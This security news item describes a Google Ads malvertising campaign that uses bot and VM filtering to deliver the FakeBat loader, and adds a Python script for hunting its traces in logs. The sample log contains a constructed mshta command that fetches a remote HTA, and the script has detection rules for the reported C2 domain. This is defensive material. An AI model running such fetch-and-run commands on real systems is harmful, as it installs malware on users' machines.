malvertising campaign that is targeting users searching for PDF converters or Notepad++ on Google. As per a TOI report, the campaign uses Google Ads to direct users to dangerous landing pages and distribute malicious payloads. According to Malwarebytes, this campaign is unique in its ability to fingerprint users and distribute time-sensitive payloads.
The hackers behind this campaign specifically target users who are searching for free versions of Notepad++ and PDF converters.
They place fake ads in Google search results that filter out bots and unwanted IP addresses before redirecting users to a decoy website. The first level of filtering happens when a user clicks one of these ads: traffic coming through VPNs or from IP addresses that do not look like genuine users is discarded. The decoy site then silently fingerprints the visitor's system to check whether the request is coming from a virtual machine.
To track potential targets and make each download unique and time-sensitive, a unique ID is assigned to each victim.
The final-stage malware establishes a connection to a remote domain ("mybigeye[.]icu") on a custom port and serves follow-on malware through an HTA payload. Jerome Segura, the director of threat intelligence at Malwarebytes, stated that threat actors are using evasion techniques to bypass ad verification checks and target specific victims. He also noted that with a reliable malware delivery chain, malicious actors can focus on improving their decoy pages and creating custom malware payloads.
Users who visit the decoy site are tricked into downloading a malicious installer, which then executes FakeBat (also known as EugenLoader).
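The chain described above leaves a few observable traces on the endpoint and network: an `mshta.exe` launch with a remote URL on its command line (the HTA payload), and a connection to the reported domain on a non-standard port. The following hunting script, added here as an example and not part of the report or of Malwarebytes' tooling, runs those three checks over constructed JSON log lines. The only indicator taken from the article is the domain `mybigeye[.]icu`; the destination port `8443`, the host names and the URL `http://updates.example.invalid/setup.hta` are placeholders made up for the sample data.

```python
"""Hunt for traces of the Notepad++/PDF-converter malvertising chain in
endpoint and proxy logs.

Added example (not from the report). Log lines are constructed; the only
real indicator is the domain reported in the article, kept defanged as
written and refanged only for matching.
"""
import json
import re
from dataclasses import dataclass

IOC_DOMAINS_DEFANGED = {"mybigeye[.]icu"}  # from the report
COMMON_WEB_PORTS = {80, 443}              # anything else from mshta is "custom"
REMOTE_URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def refang(domain: str) -> str:
    """Turn a defanged indicator ("a[.]b") back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def check_network(event: dict) -> list[Finding]:
    """Proxy/firewall event: flag IoC domains and mshta talking on odd ports."""
    host = event.get("host", "?")
    domain = event.get("dest_domain", "").lower()
    port = int(event.get("dest_port", 0))
    proc = event.get("process", "").lower()
    findings = []
    if domain in IOC_DOMAINS:
        findings.append(Finding("ioc_domain", host, f"{proc} -> {domain}:{port}"))
    if proc.endswith("mshta.exe") and port not in COMMON_WEB_PORTS:
        findings.append(Finding("mshta_custom_port", host, f"{domain}:{port}"))
    return findings


def check_process(event: dict) -> list[Finding]:
    """Process-creation event: flag mshta.exe fetching an HTA from a URL."""
    image = event.get("image", "").lower()
    cmdline = event.get("cmdline", "")
    if image.endswith("mshta.exe") and REMOTE_URL_RE.search(cmdline):
        return [Finding("mshta_remote_hta", event.get("host", "?"), cmdline)]
    return []


def hunt(lines) -> list[Finding]:
    """Run every rule over newline-delimited JSON events; return all hits."""
    findings: list[Finding] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("type") == "network":
            findings.extend(check_network(event))
        elif event.get("type") == "process":
            findings.extend(check_process(event))
    return findings


# Constructed sample log: two malicious events and two benign ones.
SAMPLE_LOG = r"""
{"type": "process", "host": "WS01", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe http://updates.example.invalid/setup.hta"}
{"type": "network", "host": "WS01", "process": "C:\\Windows\\System32\\mshta.exe", "dest_domain": "mybigeye.icu", "dest_port": 8443}
{"type": "network", "host": "WS02", "process": "C:\\Program Files\\Google\\Chrome\\chrome.exe", "dest_domain": "www.example.com", "dest_port": 443}
{"type": "process", "host": "WS02", "image": "C:\\Program Files\\Notepad++\\notepad++.exe", "cmdline": "notepad++.exe notes.txt"}
"""


def hunt_sample() -> list[Finding]:
    """Convenience wrapper so the sample run is testable by return value."""
    return hunt(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in hunt_sample():
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Running it against the sample yields three findings: the `mshta_remote_hta` launch on WS01, and for the same host both `ioc_domain` and `mshta_custom_port` on the connection to the reported domain. The benign Chrome and Notepad++ events produce nothing. In production the `IOC_DOMAINS_DEFANGED` set would be fed from a threat-intel list and the port rule tuned to the proxy's allow-list, but the structure (match on the indicator, then on the behaviour that survives an indicator change) is what makes the hunt resilient once the domain rotates.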